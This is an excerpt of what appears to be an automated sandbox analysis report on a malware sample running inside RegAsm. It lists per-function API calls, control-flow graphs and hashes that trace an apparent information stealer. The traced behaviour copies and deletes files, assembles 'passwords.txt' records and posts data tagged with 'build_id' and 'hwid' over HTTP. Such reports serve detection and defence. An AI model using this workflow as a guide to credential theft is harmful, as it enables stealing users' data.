                                                                                                                                                                                                • Opcode ID: 7f2e4029aff92c5e2c240fd50370c5247bd4e9c05f8058d29db4e94fbe2e0986
                                                                                                                                                                                                • Instruction ID: 8c1396adf68247569608152dff41ae6f6d2696e793e5c6152f52b5d6a5d56ecc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f2e4029aff92c5e2c240fd50370c5247bd4e9c05f8058d29db4e94fbe2e0986
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FA252B1804148E9CB05E7E2C556FEEBB786F25308F5049AFA542731C2DF781B58CAB6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040B302 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040B307
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00424BA4,?,?,?,00424B9E,?,00000000), ref: 0040B3FF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B460
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0040B467
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 0040B4F7
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B50E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B520
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BA8), ref: 0040B52E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B540
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BAC), ref: 0040B54E
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B55D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B56F
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BB0), ref: 0040B57D
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B58C
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B59E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BB4), ref: 0040B5AC
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B5BB
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B5CD
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BB8), ref: 0040B5DB
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BBC), ref: 0040B5E9
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040B61D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B670
                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040B69D
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                • String ID: passwords.txt
                                                                                                                                                                                                • API String ID: 3298853120-347816968
                                                                                                                                                                                                • Opcode ID: 65ab87aa7b56291ed90fd951f391f19540d8fa289d9be0b470e30e9bddc03eb4
                                                                                                                                                                                                • Instruction ID: ca72e83cddf771b3c86cf8916fbba1e6db8a1ff0d0e95ebd04ad23dcae455c32
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65ab87aa7b56291ed90fd951f391f19540d8fa289d9be0b470e30e9bddc03eb4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DC15871800118EADB05EBE1DD0AEEEBF75EF29304F10486AF512721E2DB791A18DB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0041283A Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 899sleepCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1720 41283a-4128f3 _EH_prolog call 4121c3 call 40e986 * 3 call 40e912 * 6 1741 4128f7-4128fe call 4022a1 1720->1741 1744 412904-4129a2 call 40211b call 40e9d0 call 40e97d call 40214f call 40e949 * 2 call 4010b1 call 411f59 call 40e9d0 1741->1744 1745 4129a7-412a28 call 40211b call 402135 call 4010b1 call 412046 call 40e9d0 call 40e97d call 40eb3c StrCmpCA 1741->1745 1789 412a9f-412aa3 call 40e97d 1744->1789 1775 412aa8-412abe call 40eb3c StrCmpCA 1745->1775 1776 412a2a-412a81 call 40214f call 40e949 * 2 call 4010b1 call 411f59 1745->1776 1785 412ac4-412acb call 4022a4 1775->1785 1786 413376-4133d8 call 40e9d0 call 40214f call 40e9d0 call 40e97d call 4022a8 call 40e9d0 call 40e97d call 412200 1775->1786 1816 412a86-412a99 call 40e9d0 1776->1816 1796 412ad1-412ad8 call 4022a1 1785->1796 1797 412c7f-412c95 call 40eb3c StrCmpCA 1785->1797 1884 4133dd-413451 call 40e97d * 6 call 4124d3 call 401061 1786->1884 1789->1775 1808 412b7e-412bff call 402169 call 402183 call 4010b1 call 412046 call 40e9d0 call 40e97d call 40eb3c StrCmpCA 1796->1808 1809 412ade-412b79 call 402169 call 40e9d0 call 40e97d call 40219d call 40e949 call 402169 call 4010b1 call 411f59 call 40e9d0 1796->1809 1811 412c9b-412ca2 call 4022a1 1797->1811 1812 41332e-413371 call 40e9d0 call 40219d call 40e9d0 call 40e97d call 4022c2 1797->1812 1808->1797 1934 412c01-412c70 call 40219d call 40e949 * 2 call 4010b1 call 411f59 call 40e9d0 1808->1934 1979 412c76-412c7a call 40e97d 1809->1979 1830 412e56-412e6c call 40eb3c StrCmpCA 1811->1830 1831 412ca8-412caf call 4022a1 1811->1831 1893 4132db-4132e7 call 40e9d0 1812->1893 1816->1789 1844 412e72-412e79 call 4022a1 1830->1844 1845 4132e9-41332c call 40e9d0 call 4021eb call 40e9d0 call 40e97d call 4022dc 1830->1845 1850 412d55-412dd6 call 4021b7 call 4021d1 call 4010b1 call 412046 call 40e9d0 call 40e97d call 40eb3c StrCmpCA 1831->1850 1851 412cb5-412d50 call 4021b7 call 40e9d0 call 40e97d call 4021eb call 40e949 call 4021b7 call 4010b1 call 411f59 call 40e9d0 1831->1851 1871 41302d-413043 call 40eb3c StrCmpCA 1844->1871 1872 412e7f-412e86 call 4022a1 1844->1872 1845->1893 1850->1830 2001 412dd8-412e47 call 4021eb call 40e949 * 2 call 4010b1 call 411f59 call 40e9d0 1850->2001 2037 412e4d-412e51 call 40e97d 1851->2037 1903 413049-413050 call 4022a1 1871->1903 1904 413298-4132d7 call 40e9d0 call 402239 call 40e9d0 call 40e97d call 4022f6 1871->1904 1901 412f2c-412fad call 402205 call 40221f call 4010b1 call 412046 call 40e9d0 call 40e97d call 40eb3c StrCmpCA 1872->1901 1902 412e8c-412f27 call 402205 call 40e9d0 call 40e97d call 402239 call 40e949 call 402205 call 4010b1 call 411f59 call 40e9d0 1872->1902 1922 41327b-413293 call 40e97d call 412200 1893->1922 1901->1871 2056 412faf-41301e call 402239 call 40e949 * 2 call 4010b1 call 411f59 call 40e9d0 1901->2056 2083 413024-413028 call 40e97d 1902->2083 1928 413056-41305d call 4022a1 1903->1928 1929 4131fe-413214 call 40eb3c StrCmpCA 1903->1929 1904->1893 1922->1884 1965 413103-413184 call 402253 call 40226d call 4010b1 call 412046 call 40e9d0 call 40e97d call 40eb3c StrCmpCA 1928->1965 1966 413063-4130fe call 402253 call 40e9d0 call 40e97d call 402287 call 40e949 call 402253 call 4010b1 call 411f59 call 40e9d0 1928->1966 1968 413226-413275 call 40e9d0 call 402287 call 40e9d0 call 40e97d call 402310 call 40e9d0 1929->1968 1969 413216-413221 Sleep 1929->1969 1934->1979 1965->1929 2089 413186-4131f2 call 402287 call 40e949 * 2 call 4010b1 call 411f59 call 40e9d0 1965->2089 2104 4131f5-4131f9 call 40e97d 1966->2104 1968->1922 1969->1741 1979->1797 2001->2037 2037->1830 2056->2083 2083->1871 2089->2104 2104->1929
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041283F
                                                                                                                                                                                                  • Part of subcall function 004121C3: _EH_prolog.MSVCRT ref: 004121C8
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412A20
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412AB6
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00411F59: _EH_prolog.MSVCRT ref: 00411F5E
                                                                                                                                                                                                  • Part of subcall function 00411F59: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411FBC
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412BF7
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412C8D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412DCE
                                                                                                                                                                                                  • Part of subcall function 00412046: _EH_prolog.MSVCRT ref: 0041204B
                                                                                                                                                                                                  • Part of subcall function 00412046: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004120CD
                                                                                                                                                                                                  • Part of subcall function 00412046: lstrlenA.KERNEL32(00000000), ref: 004120E4
                                                                                                                                                                                                  • Part of subcall function 00412046: StrStrA.SHLWAPI(00000000,00000000), ref: 0041210B
                                                                                                                                                                                                  • Part of subcall function 00412046: lstrlenA.KERNEL32(00000000), ref: 00412120
                                                                                                                                                                                                  • Part of subcall function 00412046: lstrlenA.KERNEL32(00000000), ref: 0041213B
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412E64
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FA5
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041303B
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041317C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041320C
                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 0041321B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                                                                                                                                • String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                • API String ID: 1345713276-2213018930
                                                                                                                                                                                                • Opcode ID: c0b8c9bbd540cfc0df7d129a4e8ce1bdbf0f8735db66cdbbd598687327e196cc
                                                                                                                                                                                                • Instruction ID: c308ea03e03e0c32b438cdc6c2e81010450e68a08df78ec56f89ad1a897ee148
                                                                                                                                                                                                • Opcode Fuzzy Hash: c0b8c9bbd540cfc0df7d129a4e8ce1bdbf0f8735db66cdbbd598687327e196cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF7253B0D00248EADB41E7E6C946BDDBBB8AF15304F1044AEE445B32C2DB785B58CB76
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00403B17 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513networkstringfileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2116 403b17-403be6 _EH_prolog call 40e949 call 403a76 call 40e912 * 5 call 40eb3c InternetOpenA StrCmpCA 2133 403be8 2116->2133 2134 403bea-403bed 2116->2134 2133->2134 2135 403bf3-403d71 call 40fb47 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 2 InternetConnectA 2134->2135 2136 404144-4041d3 InternetCloseHandle call 40fa7f * 2 call 40e97d * 8 2134->2136 2135->2136 2207 403d77-403daa HttpOpenRequestA 2135->2207 2208 403db0-403db2 2207->2208 2209 40413b-40413e InternetCloseHandle 2207->2209 2210 403db4-403dc4 InternetSetOptionA 2208->2210 2211 403dca-4040d5 call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40e912 call 40ea17 * 2 call 40e9d0 call 40e97d * 2 call 40eb3c lstrlenA call 40eb3c * 2 lstrlenA call 40eb3c HttpSendRequestA 2208->2211 2209->2136 2210->2211 2322 404111-404126 InternetReadFile 2211->2322 2323 4040d7-4040dc 2322->2323 2324 404128-404136 InternetCloseHandle call 40e97d 2322->2324 2323->2324 2325 4040de-40410c call 40ea8b call 40e9d0 call 40e97d 2323->2325 2324->2209 2325->2322
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00403B1C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BC7
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00403BDE
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D66
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403DA0
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DC4
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004249CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 004040A0
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004040B9
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040CA
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040411E
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404129
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040413E
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404147
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                • API String ID: 1139859944-3346224549
                                                                                                                                                                                                • Opcode ID: 15b485722b9c602a729ca5fa6ab806c4251012afa5fc40f7d4f12ac64c36a392
                                                                                                                                                                                                • Instruction ID: 127932786617c287c74a1cf09914acf07e266ab5e26ab2cbaf5a59b4efe1ea99
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15b485722b9c602a729ca5fa6ab806c4251012afa5fc40f7d4f12ac64c36a392
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC2270B1800148EADB01EBE2C956EEEBBB9AF19304F1044AEE541731C2DF781B58DB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00406783 Relevance: 33.5, APIs: 22, Instructions: 511stringmemoryfileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2332 406783-4067ac _EH_prolog call 40eb17 2335 4067b8-4067cb call 40eb17 2332->2335 2336 4067ae-4067b6 2332->2336 2341 4067d1 2335->2341 2342 406893-4068a0 call 40eb17 2335->2342 2337 4067d6 call 40e986 2336->2337 2343 4067db-406891 call 40e912 call 40fb47 call 40ea8b call 40ea17 call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 5 2337->2343 2341->2337 2342->2343 2349 4068a6-4068c2 call 40e97d * 2 2342->2349 2380 4068e0-4068fc call 40eb3c * 2 CopyFileA 2343->2380 2358 406e54-406e75 call 40e97d call 401061 2349->2358 2385 4068c7-4068dd call 40e949 call 410041 2380->2385 2386 4068fe-406929 call 40e912 call 40ea8b 2380->2386 2385->2380 2395 4069c2-406a96 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40ea8b call 40e9d0 call 40e97d 2386->2395 2396 40692f-4069bd call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 2386->2396 2437 406a99-406ab9 call 40e97d call 40eb3c 2395->2437 2396->2437 2451 406e02-406e14 call 40eb3c DeleteFileA call 40eb03 2437->2451 2452 406abf-406ada 2437->2452 2462 406e19-406e51 call 40eb03 call 40e97d * 4 2451->2462 2458 406ae0-406af6 GetProcessHeap RtlAllocateHeap 2452->2458 2459 406dee-406e01 2452->2459 2461 406d6a-406d77 2458->2461 2459->2451 2468 406afb-406ba8 call 40e912 * 6 call 40eb17 2461->2468 2469 406d7d-406d89 lstrlenA 2461->2469 2462->2358 2507 406bb2 2468->2507 2508 406baa-406bb0 2468->2508 2471 406d8b-406dc9 lstrlenA call 40e949 call 4010b1 call 413452 2469->2471 2472 406ddf-406deb memset 2469->2472 2489 406dce-406dda call 40e97d 2471->2489 2472->2459 2489->2472 2509 406bb8-406bcf call 40e986 call 40eb17 2507->2509 2508->2509 2514 406bd1-406bd7 2509->2514 2515 406bd9 2509->2515 2516 406bdf-406bf0 call 40e986 call 40eb30 2514->2516 2515->2516 2521 406bf2-406bfa call 40e986 2516->2521 2522 406bff-406d65 call 40eb3c lstrcat * 2 call 40eb3c lstrcat * 2 call 40eb3c lstrcat * 2 call 40eb3c lstrcat * 2 call 40eb3c lstrcat * 2 call 40eb3c lstrcat * 2 call 4063fd call 40eb3c lstrcat call 40e97d lstrcat call 40e97d * 6 2516->2522 2521->2522 2522->2461
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00406788
                                                                                                                                                                                                  • Part of subcall function 0040EB17: StrCmpCA.SHLWAPI(?,?,?,004067AA,?,00000000), ref: 0040EB20
                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00424BD0,?,?,?,00424BA6,?,00000000), ref: 004068F4
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00410041: _EH_prolog.MSVCRT ref: 00410046
                                                                                                                                                                                                  • Part of subcall function 00410041: memset.MSVCRT ref: 00410068
                                                                                                                                                                                                  • Part of subcall function 00410041: OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 004100EF
                                                                                                                                                                                                  • Part of subcall function 00410041: TerminateProcess.KERNEL32(00000000,00000000), ref: 004100FD
                                                                                                                                                                                                  • Part of subcall function 00410041: CloseHandle.KERNEL32(00000000), ref: 00410104
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
